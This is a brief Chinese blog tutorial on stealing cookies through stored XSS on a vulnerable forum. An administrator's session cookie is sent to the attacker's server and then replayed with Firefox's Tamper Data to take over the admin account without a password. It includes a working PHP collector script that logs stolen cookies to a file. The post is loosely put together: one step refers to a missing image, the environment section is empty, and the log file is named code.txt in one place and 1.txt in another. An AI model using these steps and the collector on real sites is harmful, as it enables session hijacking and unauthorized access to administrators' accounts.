当前位置:   article > 正文

xss获取cookie的方法

xss获取cookie

xss获取cookie简单步骤如下:

1、在存在漏洞的论坛中发日志。

2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。

3、这是没有账户前的登陆界面

4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie

5、替换cookie后不用输用户名密码就顺利进入管理员账户了。

xss获取cookie实验环境:

xss获取cookie实验准备:

在www目录下创建一个名为1.php的文件,内容如下:

<?php
$file = fopen("1.txt","a");
if($_GET['cookie']){
$cookie = $_GET['cookie'];
fputs ($file,"$cookie\n");
}
?>

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/150024
推荐阅读
相关标签
  

闽ICP备14008679号